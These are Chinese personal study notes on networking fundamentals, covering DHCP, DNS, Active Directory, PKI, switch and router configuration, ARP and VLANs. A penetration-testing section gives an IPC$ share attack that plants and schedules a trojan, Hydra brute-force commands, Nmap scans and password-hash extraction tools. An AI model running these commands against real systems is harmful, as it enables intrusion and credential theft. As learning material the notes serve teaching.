网络基础知识笔记

B站千峰网络信息安全开源视频课程

beglage的CSDN博客

计算机网络【第7版】谢希仁

可能未来一段时间要进行网络方面的工作，特来补充一下网络的基础知识，仅作学习使用，本人做了些补充，若有错误，还望指正。

另外，改变了一下笔记的格式，我喜欢放在一篇笔记里，可能有些长。

---

一、DHCP部署与安全

• Dynamic Host Configure Protocol

1、作用

自动分配IP地址

2、DHCP的相关概念

• 地址池/作用域：（IP、子网掩码、网关、DNS、租期），DHCP协议端口是UDP 67/68

3、DHCP优点

减少工程量、避免IP冲突、提高地址利用率

4、DHCP原理

称为DHCP租约过程，分为4个步骤：

1）发送DHCP Discovery广播包

​ 客户机广播请求IP地址（包含客户机的MAC地址）

2）相应DHCP Offer广播包

​ 服务器响应提供的IP地址（但无子网掩码、网关等参数）

3）发送DHCP Request广播包

​ 客户机选择IP（也可认为确认使用哪个IP）

4）服务器发送DHCP ACK（acknowledge确认）广播包

​ 服务器确定了租约，并提供网卡详细参数IP、子网掩码、网关、DNS、租期等

5、DHCP续约

当50%之后，客户机会再次发送DHCP Request包，进行续约，如服务器无响应 ，则继续使用并在87.5%再次发送DHCP Request包，进行续约，如仍然无响应，并释放IP地址，重新发送DHCP Discovery广播包来获取IP地址，当无任何服务器响应时，自动给自己分配一个169.254.x.x/16，署于全球统一无效地址，用于临时内网通信。

6、部署DHCP服务器

1）IP地址固定（服务器必须固定IP地址）

2）安装DHCP服务插件

3）新建作用域及作用域选项

4）激活

5）客户机验证

ifconfig /release  激活IP（取消租约，或者改为手动配置IP，也可以释放租约）

ipconfig /renew   重新获取IP（有IP时，发送request包续约，无IP时发送Discovery重新获取IP）

7、地址保留

针对指定的MAC地址，固定动态分配IP地址

8、选项优先级

作用域选项>服务器选项

当服务器上有多个作用域时，可以在服务器选项上设置DNS服务器

9、DHCP备份

10、DHCP攻击与防御

1）攻击DHCP服务器：频繁的发送伪装DHCP请求，直到将DHCP地址池资源耗尽，

​ 防御：在交换机上（管理型）的端口上做动态MAC地址绑定

2）伪装DHCP服务器攻击：hack通过将自己部署为DHCP服务器，为客户机提供非法ip地址

​ 防御：在交换机上（管理型），除合法的DHCP服务器所在接口外，全部设置为禁止发送dhcp offer包

二、DNS部署与安全

1、DNS

Domain Name Service

域名服务

作用：为客户机提供域名解析的服务器

2、域名组成

2.1、域名组成概述

如“www.sina.com.cn”是一个域名，从严格意义上讲，“sina.com.cn”才被称为域名(全球唯一)，而“www.”是主机名。

“主机名.域名”称为完全限定域名（FQDN，Full Quality Domain Name）。一个域名下可以有多个主机，域名全球唯一，那么“主机名.域名”肯定也是全球唯一的。

以“sina.com.cn”域名为例，一般管理员在命名其主机的时候会根据其主机的功能而命名，比如网站的是www，博客的是blog，论坛的是bbs，那么对应的FQDN为www.sina.com.cn，blog.sina.com.cn，bbs.sina.com.cn，这么多个FQDN，然而我们只需要申请一个域名即”sina.com.cn“即可

nslookup 域名

万网阿里云买域名

2.2、域名组成

树形结构

根域 .

顶级域（也称为一级域名）

​ 国家顶级域 cn jp hk uk

​ 商业顶级域

​ com 商业机构

​ edu 教育机构

​ org 民间组织机构

​ net 互联网

二级域名

三级域名

…

如：www.baidu.com.
.com 为顶级域
baidu为二级域名
www为主机名

FQDN=主机名.DNS后缀
FQDN（完整合格的域名）

3、监听端口

TCP 53
UDP 53

4、DNS解析种类

4.1、按照查询方式分类：

1）递归查询：客户机与本地DNS服务器之间
2）迭代查询：本地DNS服务器与根等其他DNS服务器的解析过程

4.2、按照查询内容分类：

1）正向解析：已知域名，解析IP地址

2）反向解析：已知IP地址，解析域名

清除dns记录:   ipconfig /flushdns

三、WEB服务器和FTP服务器

WEB服务器

1. web服务器也称为网页服务器或HTTP服务器

2. web服务器使用的协议是HTTP或HTTPS

3. HTTP协议端口号：TCP 80

   HTTPS协议端口号：TCP 443

4. web服务器发布软件：

   微软：IIS（Internet Information Service，可以发布web网站和ftp站点）

   linux：Apache/LAMP/Tomcat/nginx等等

   第三方：phpstudy、XAMPP

5. 部署web服务器

   1. 配置静态IP地址
   2. 安装IIS-WEB插件
   3. 停用默认站点
   4. 新建网站-地址端口绑定-指定站点路径-设置权限
   5. 设置默认文档（设置首页）

6. 一台服务器同时发布多个web站点：

   1. 不同的IP相同地端口
   2. 相同的IP，不同的端口
   3. 相同地IP，相同的端口，不同的域名（主机头）

7. 网站类型：

   1. 静态网站：一般扩展名为.html或.htm，无后台数据库
   2. 动态网站：一般扩展名为.asp或.php，有后台数据库，asp或php可以连接前台页面与后台数据库

FTP服务器

1. File Transfer Protocol文件传输协议

2. 端口号：TCP 20/21

3. ftp工作方式：

   1）主动模式

   2）被动模式

4. 部署FTP服务器

   1）配置静态IP

   2）安装IIS-ftp软件

   3）使用默认站点或创建新的站点

   注意：用户最终权限为FTP权限与NTF权限取交集

   建议:FTP权限全部勾选，然后具体地在NTFS里做

   4）去掉匿名访问对勾

四、域

1、Domain

2、内网环境：

1）工作组：默认模式，人人平等，不方便管理

2）域：人人不平等，集中管理，统一管理

3、域的特点：

集中/统一管理

4、域的组成：

1）域控制器（Domain Controller）

2）成员机

5、域的部署

1）安装域控制器-就生成了域环境

2）安装了活动目录-就生成了域控制器

3）活动目录：Active Directory = AD

6、活动目录

1）AD

2）特点：集中管理/统一管理

7、组策略GPO

8、部署安装活动目录：

1）开启2008虚拟机，并桥接到
 
2）配置静态IP地址10.1.1.1/24
 
3）开始--运行--输入dcpromo，安装活动目录
 
弹出向导：
 
勾选DNS-新林中新建域--功能级别都设置为2003域的FQDN（gcd.com）--设置目录服务还原密码-
 
4）在DC登录域GCD\administrator
 
DC的本地管理员升级为域管理员
 
5）验证AD是否安装成功
 
    1-计算机右键属性--所属域
 
    2-DNS服务器中是否自动创建gcd.com区域文件
 
    3-自动注册DC的域名解析记录
 
    4-开始--管理工具--AD 用户和计算机
 
computer：普通域成员机列表
 
Domain Controller：DC列表
 
users：域帐号

9、PC加入域

1、配置IP，并指DNS

2、计算机右键属性–更改–加入gcd.com域

3、重启加入域后，成功使用用户登录成员机

10、常见的小问题

1）加入域不成功
 
网络是不是不通
 
解析是否成功解析
 
是否为DNS缓存问题
 
2）登入域不成功
 
如XP，以勾选登录域QF，不用再写gcd.com\xiaofei.wen
 
3）域用户的权限
 
建议将域用户加入到普通成员机的本地管理员组中
 
×××××××本店管理员组：administrators
 
×××××××域管理员组：Domain Admins

11、OU：组织单位

作用：用来归类域资源（域用户、与计算机、域组）

12、组策略：Group Policy = GPO

作用：通过组策略可以修改计算机的各种属性，如开始菜单、桌面背景、网络参数等。

重点：组策略在域中，是基于OU来下发的！！

LSDOU（策略优先级）

在应用过程中，如果出现冲突，后应用的生效

组策略的阻止继承及强制！

**********正常情况下：LSDOU顺序
上级OU： 桌面：aa 运行：删除
下级OU： 桌面：未配置 运行：不删除
下级OU用户结果：桌面：aa 运行：不删除
*********下级OU设置了组织继承：
下级OU用户结果：桌面：未配置 运行：不删除
××××××上级设置了强制：
下级OU用户结果：桌面：aa 运行：删除
注意：当上级强制和下级阻止继承同时设置，强制生效！

五、PKI

1、PKI概述

名称：Public Key Infrastruction 公钥基础设施

作用：通过加密技术和数字签名保证信息的安全

组成：公钥机密技术、数字证书、CA、RA

2、信息安全三要素

机密性

完整性

身份验证/操作的不可否认性

3、哪些IT领域用到PKI：

1）SSL/HTTPS

2）IPsecVPN

3）部分远程访问VPN

4、公钥加密技术

作用：实现对信息加密、数字签名等安全保障

加密算法：

1）对称加密算法

加解密道的密钥一致

DES 3DES AES

2）非对称加密算法

通信双方各自产生一对公私钥

双方各自交换公钥

公钥和私钥互为加解密关系！

公私钥不可互相逆推！

RSA DH

3）HASH算法：MD5 SHA（不可逆,验证完整性）

HASH值 = 摘要

5、数字签名：

用自己的私钥对摘要加密得出的密文就是数字签名

6、证书：

证书用于保证公密钥的合法性

证书格式遵循X.509标准

数字证书保护信息：

使用者的公钥值

使用者标识信息（如名称和电子邮件地址）

有效期（证书的有效时间）

颁发者标识信息

颁发者的数字签名

数字证书由权威公正的 第三方机构即CA签发

PKI实验

实验步骤;

1、配置服务器IP地址10.1.1.2/24

2、安装IIS服务，并建立站点。

在xp客户机上验证访问 http://www.flower.com

3、安装CA组件

4、打开IIS，先生成证书申请文件

5、向CA申请证书：

打开网页：http://10.1.1.2.certsrv 并向CA发送web服务器申请文件

6、CA颁发证书

7、在web服务器上下载并完成安装

8、在web服务器上启用SSL443

9、在客户端上验证

六、渗透测试

0、授权

1、信息收集

nslookup whois

2、扫描漏洞

nmap = ip范围 端口 80（IIS，apache,什么网站）

scanpot

高级扫描：如IIS漏洞2003-IIS6.0 2008-IIS7.0

扫描网站漏洞

3、漏洞利用

4、提权（shell（命令行cmd）环境、桌面环境、最高权限）

5、毁尸灭迹

6、留后门

7、渗透测试报告

手工测试端口号开放：

telnet IP 地址 测试端口

445漏洞利用之一IPC$：

1、scanport 扫描445端口

2、进行暴力破解：NTscan

3、

net use f: \\10.1.1.2\ipc$ 密码 /user:用户

=================================================

net use f: \\10.1.1.2\share 密码 /user:用户
//将共享文件夹映射到本地盘符作为本地F盘使用

net use * /del

net use f: \\10.1.1.2\c$ 密码 /user:用户

=================================================

4、制作木马

5、植入木马（留后门）

copy d:\heihei.exe \\10.1.1.2\c$

6、设计计划任务自动执行木马：

net time \\10.1,1.2


at \\10.1.1.2 11:11 "c:\heihei.exe"

7、等待肉鸡上线

七、扫描技术

主机探测与端口扫描

21           FTP
22           SSH
23           Telnet
25           SMTP
80           HTTP
443          HTTPS
1433         SQL Server
1521         Oracle
3306         MySQL
3389        RDP

Nmap-扫描之王

重要的常用参数

-sP        扫描主机是否在线（ping扫描）
-p         指定端口范围
-sV        服务版本探测
-O(大写)         启用操作系统探测
-A         全面扫描
-oN        保存txt

Nmap -sP 10.1.1.1/24   扫描10.1.1.0 整个网段
Nmap -p 21,23-25,3389, 10.1.1.1
Nmap -p 21,23 10.1.1.1 -sV  扫描21，23的服务版本
Nmap -A 10.1.1.1    全面扫描
Nmap -O 10.1.1.1 扫描目标系统版本
Nmap -p 21,23 10.1.1.1 -oN d:\result.txt 

Hydra 远程暴力破解

Hydra.exe -l a -p 123 10.1.1.1 telnet   

Hydra.exe -l a -P d:\password.txt 10.1.1.1 rdp

Hydra.exe -l a -P d:\password.txt 10.1.1.1 smb

Hydra.exe -l a -P d:\password.txt 10.1.1.1 ftp

Hydra.exe -l a -P d:\password.txt 10.1.1.1 ssh

Hydra.exe -l a -P d:\password.txt 10.1.1.1 mysql

Hydra.exe -L d:\user.txt -P d:\password.txt 10.1.1.1 mysql

5次shift破解系统密码

利用PE破解系统密码

远程爆破

nmap

NTscan

Hydra

本地破解：

Getpass 从内存中提取密码（win10之前的系统）

本地暴力破解：

Pwdump 提取sam中的hash值

手工将hash值存储到hash.txt中

使用saminside软件进行暴力破解

八、OSI与TCP/IP协议

OSI(Open System interconnection)开放通信系统互联参考模型

分层思想

通信需求   ->    定义协议标准

同层使用相同的协议，下层为上层提供服务

将复杂的流程分解为几个功能相对单一的子过程
    -整个流程更加清晰，复杂问题简单化
    -更容易发现问题并 针对性的解决问题

TCP/IP5层协议簇/协议栈

数据/PDU           应用层       PC/防火墙
数据段/段          传输层       防火墙
报文/包/IP包       网络层       路由器
帧Fame             数据链路层   交换机 网卡
比特bit            物理层       网线
8bit = 1Byte字节   100Mb/s

数据的封装与解封装过程

封装过程：

解封装过程：

物理层 physical layer

1、网线/光纤/空气
2、比特bit
    8bit = 1Byte
    1024B = 1KB
    1024KB = 1MB
    1024MB = 1GB
    1024GB = 1TB
    1024TB = 1PB
3、信号：模拟信号、数字信号
         放大器    中继器
         光信号
             光线类型:
                 1)单模光纤 一般是黄色
                 2)多模光纤 一般是橙色/蓝色
4、网线/双绞线：
    5类双绞线
    超5类双绞线
    6类（增强抗干扰能力） 7类 chegn 

T568A：白绿、绿、白橙、蓝、白蓝、橙、白棕、棕

T568B：白橙、橙、白绿、蓝、白蓝、绿、白棕、棕

网线的用途分类
    1、交叉线：一端为A，一段为B。同种设备间使用！（三层及以上的设备）
    2、直通线：两端都是A或都是B。异种设备间使用！（一般是B）
    3、全反线：一端为A，另一端为反A，也称console线

Ethernet    10Mb/s
FastEthernet       100Mb/s
GigabitEtherrnet        1000Mb/s
TenGigabitEtherrnet         10000Mb/s

数据链路层（2层 Data Link Layer）

1、以太网MAC帧结构（以太网V2标准）

帧格式：

• 协议802.3，有线网卡

• 协议802.11，无线网卡

帧头：6+6+2 = 14字节

最大传送单元MTU（Maximum Transfer Unit）：1500字节，每个国家规定不一样

帧尾：4字节

帧头内容：目标MAC、源MAC、类型（MAC地址为6个字节，48位）

类型作用：识别上层协议

• 0x0800：上层为IP协议

• 0x0806：上层为ARP协议

帧尾（FCS）：使用CRC检验

2、工作在数据链路层的设备：

交换机/网卡（网络适配器）

3、交换机的工作原理（以太网交换机的自学习，构造交换表）

收到一个数据帧后：

1、首先学习帧中的源MAC地址来形成MAC地址表

2、然后检查帧中的目标MAC地址，并匹配MAC地址：

如表中有匹配项，则单播转发

如表中无匹配项，则除接收端口外广播转发

3、MAc地址表的老化时间默认是300秒（可修改）

4、交换机的端口

E 10Mb
F 100Mb
G 1000Mb
Te 10000Mb

F0/1
0模块号
1接口号

接口速率自适应：1000/100/10自适应
速率工作模式可以为10/100/1000任何一种状态

端口状态：up/down
down的3种可能：
1）人工down掉
2）速率不匹配
3）双工模式不匹配（双工duplex）

双工模式：单工、半双工、全双工

5、交换机5大基本工作模式

第一次配置网络设备，需使用console线

在PC上需要使用”超级终端“或其他软件。

1）用户模式：
    switch> 
        可以查看交换机的基本简单信息，且不能做任何修改配置！
2）特权模式
    switch> enable
    switch#>
        可以查看所有配置，且不能修改配置，但可以做测试、保存、初始化等操作
3)全局配置模式
    switch# congigure terminal
    switch(config)#
        默认不能查看配置！
        可以修改配置，且全局生效！
4）接口配置模式：
    switch(config)#interface f0/1
    switch(config-if)#
        默认不能查看配置！
        可以修改配置，且对该接口生效！
5）console口/线/控制台配置模式：
    switch(config)#line console 0
        默认不能查看配置！
        可以修改配置，且对console口生效！
命令：
6、
    exit 退出一级
    end 直接退到特权模式
7、支持命令缩写
8、？的用法
9、历史命令
10、tab补全键
11、配置主机名：
    conf t
    hostname 折设备名
12、设置用户密码：
    line co 0
    password 密码
    login
    exit
13、快捷键：
    ctrl+u : 快速删除光标前所有字符
    ctrl+a : 快速定位光标到行首
    ctrl+e : 快速定位光标到行尾
14、
    在内存中存在一个文件：
    running-config
    第一次开机，系统会在内存中自动创建一个新的干净的running-config
15、配置
    en
    copy running-config startup-config
    或
    write
16、交换机开机动作：
    先去硬盘中查找startup-config是否存在：
    如果不存在，内存中创建新的running-config
    如果存在，则复制到内存中并改名为running-config
17、查看running-config配置
    en
    show running-config
18、查看startup-config配置
    en
    show startup-config
19、重启设备：
    en
    reload
20、配置特权密码：
    conf t
    enable password 密码（明文）
    enable secret 密码 （密文）
21、查看MAC地址表
    show mac-address-table
22、查看接口状态列表：
    show ip int brief
    show ip int b
23、手工关闭接口
    int f0/x
    shutdown
    exit
23、手工开启接口
    int f0/x
    no shutdown
    exit
24、do的用法
    其他模式加do空格可以强制使用特权模式的命令	
    如：
        do sh run
        do sh ip int b
        do wr
25、删除配置
    1)在哪配置的，就在哪删！
    2)命令前加no 空格
    3)原命令中有参数，并且参数具有唯一性，则删除时不需要加参数
    如：
        conf t 
        hostname sw1
 
        conf t
        no hostname
26、清空/擦除/初始化配置
    en
    erase start-config
27、为3层端口 配置IP：
    int f0/0
    ip add 10.1.1.254 255.255.255.0
    no shutdown
28、开启远程控制：
    conf t
    line vty 0 4
    transport input telnet/ssh/none/all
    password 密码
    login
    exit
 
    conf t
    hostname r1
    ip domain-name r1.qf.com
    crypto key generate rsa   //生产密钥对
    line vty 0 4
    transport input telnet/ssh/none/all
    login local
    exit
    username xx password 123.com
29、为交换机配置管理IP：
    conf t
    int vlan 1
    ip add 10.1.1.253 255.255.255.0
    no shut
30、为交换机配置默认网关
    目的：可跨网段管理
    conf t
    ip defaut-gateway 10.1.1.254
31、关闭自动解析功能：
    conf t
    no ip domain-lookup

九、IP包头分析与路由原理及实验

IP数据包最少20个字节：

• 版本（4个比特）：IPV4（0100）还是IPV6（1100）
• 首部长度：单位是字节（Byte），最多表示15，也就是60个字节

路由原理

路由：

跨越从源主机到目标主机的一个互联网来转发数据包的过程

路由器为IP包选择路径的过程

静态路由：
conf t
ip route 目标网段 子网掩码 下一跳IP
如：
ip route 70.1.1.0 255.255.255.0 20.1.1.2

默认路由：
conf t
ip route 0.0.0.0 0.0.0.0 下一跳IP
如：
ip route 0.0.0.0 0.0.0.0 20.1.1.2

浮动路由：
在静态或默认路由后加空格+数字（正整数）
ip route 0.0.0.0 0.0.0.0 20.1.1.2
ip route 0.0.0.0 0.0.0.0 30.1.1.2 2

查看路由表：
show ip route

查看接口列表：
show ip int b

实验：

一：静态路由

二：默认路由

有影响，容易形成回环地址。

详情参照：[网络安全学习篇16]：单臂路由、ICMP协议（千峰网络安全视频笔记 16 day）中的回环地址

三： 浮动路由

1）

2）升级版

十、ARP协议、ARP欺骗与攻击

1、广播与广播域概述

• 广播与广播域

  • 广播：将广播地址作为目的地址的数据帧
  • 广播域：网络中能接收到同一个个广播所有节点的集合

• MAC地址广播

  • 广播地址：FF－FF－FF－FF－FF－FF

• IP地址广播

  1、255.255.255.255

  2、广播IP地址为IP地址网段的广播地址，如192.168.1.255/24

2、ARP协议概述

• 地址解析协议（Address Resolution Protocol）

• 将一个已知的IP地址解析成MAC地址

• IP地址解析为MAC地址

  • PC1发送数据给PC2，查看缓存没有PC2的MAC地址
  • PC1发送ARP请求消息（广播）
  • 所有主机收到ARP请求消息
    • PC2回复ARP应答（单播）
    • 其他主机丢弃
  • PC1将PC2的MAC地址保存到缓存中，发送数据

3、ARP相关命令

Windows系统中的ARP命令：
arp -a：查看ARP缓存表 
arp -d：清除ARP缓存
arp -s: ARP绑定

4、ARP攻击或欺骗的原理

通过发送伪造虚假的ARP报文（广播或单播），来实现攻击或欺骗

如虚假报文的MAC是伪造的不存在的，实现ARP攻击，结果为终端通信/断网

如虚假报文的MAC是攻击者自身的MAC地址，实现ARP欺骗，结果可以监听、窃取、篡改、控制流量，但不中断通信！

• ARP协议没有验证机制，所以会被欺骗
• ARP攻击者通过发送虚假伪造的ARP报文对受害者进行ARP缓存投毒

5、ARP攻击防御

１、静态ARP绑定

手工绑定/双向绑定

Windows客户机上：
ARP -s inet_addr eth_addr [if_addr]
ARP -d inet_addr [if_addr]
ARP -a [inet_addr] [-N if_addr] [-v]

  -a            通过询问当前协议数据，显示当前 ARP 项。如果指定 inet_addr，则只显示指定计算机的 IP 地址和物理地址。如果不止				   一个网络接口使用 ARP，则显示每个 ARP 表的项。
  -g            与 -a 相同。
  -v            在详细模式下显示当前 ARP 项。所有无效项和环回接口上的项都将显示。
  inet_addr     指定 Internet 地址。
  -N if_addr    显示 if_addr 指定的网络接口的 ARP 项。
  -d            删除 inet_addr 指定的主机。inet_addr 可以是通配符 *，以删除所有主机。
  -s            添加主机并且将 Internet 地址 inet_addr与物理地址 eth_addr 相关联。物理地址是用连字符分隔的 6 个十六进制字节。该项是永久的。
  eth_addr      指定物理地址。
  if_addr       如果存在，此项指定地址转换表应修改的接口的 Internet 地址。如果不存在，则使用第一个适用的接口。
示例:
  > arp -s 157.55.85.212   00-aa-00-62-c6-09.... 添加静态项。
  > arp -a                                  .... 显示 ARP 表。
  
2、ARP防火墙

自动绑定静态ARP

主动防御

3、硬件级ARP防御

交换机支持”端口“做动态ARP绑定（配合DHCP服务器）

或做静态ARP绑定

6、路由器的工作原理

1)一个帧到到达路由,路由器首先检查目标MAC地址是否自己,如果不是自己则丢弃,如果是则解封装,并将IP包送到路由器内部

2)路由器检查IP包头中的目标IP,并匹配路由表,如果匹配失败,则丢弃,并向源IP回馈错误信息,如果匹配成功,则将IP包路由到出接口.

3)封装帧，首先将出接口的MAC地址作为源MAC地址封装好,然后检查ARP缓存表,检查是否有下一跳的MAC地址,如有,将提取其并作为目标MAC地址封装到帧中，如没有，则发送ARP广播请求下一跳的MAC地址，并获取对方的MAC地址，再记录缓存，并封装帧，最后将帧发送出去．

十一、VLAN(Virtual LAN 虚拟局域网)

1、简述

• 广播/广播域（在内网中，越小越好）

• 广播的危害：曾加网络/终端负担，传播病毒，安全性

• 如何控制广播？

  控制广播=隔离广播域

  路由器隔离广播（物理隔离广播）

  路由器隔离广播缺点：成本高、不灵活

• 采用VLAN来控制广播，控制广播，逻辑隔离广播域

  VLAN技术是在交换机上实现的且通过逻辑隔离划分的广播域

• 一个VLAN = 一个广播域 = 一个网段

  VLAN 是二层技术（数据链路层里的技术）

2、VLAN的类型：

1）静态VLAN

*手工配置

*基于端口划分的VLAN

2）动态VLAN

*手工配置

*基于MAC地址划分的VLAN//参用802.1x端口认证，基于账号来划分VLAN

3、静态VLAN命令

思科的命令：
1）创建VLAN
 
conf t
 
vlan ID,ID,ID-ID
 
[name 自定义名称]
 
exit
 
2）查看VLAN表：
 
show vlan b
 
3)将端口加入到VLAN：
 
int f0/x
 
switchport access vlan ID
 
exit

4、引入VLAN后 以太网的帧格式

规定以太网帧格式扩展的标准：802.3ac标准

插入VLAN标记得出的帧：称为802.1Q帧

链路上要传送这种802.1Q帧，交换机才能区分是否划分了虚拟局域网

5、引入vlan后出现的问题

这是视频课程中老师构建的网络拓扑图，有两个局域网，通过两台交换机进行连接，引入vlan后，pc下面的vlan标记是PC属于的区域，可以看到vlan10这个区域有3台PC，vlan20这个区域有2台PC。但是红色框中两台PC虽然在一个虚拟局域网中，却并不能通信。

原因是：交换机fa0/10接口，允许发出的vlan标记是默认的vlan0，fa0/9允许通信的vlan标记也是默认的vlan0，如果想要发送或接收vlan10区域的帧，需要配置交换机的这两个接口或者再通过接口引一条线，将接口配置成允许vlan10通信。

粉色框中的PC也是不能通信的，解决方法同上。但是不难猜想，如果有很多区域，这种方法是不可行的。

---

参考文献：

B站千峰网络信息安全开源视频课程

计算机网络【第7版】谢希仁

beglage的CSDN博客

仅作学习使用，个人做了些补充，若有错误，还望指正。另外，改变了一下笔记的格式，和视频课程中有不少出入。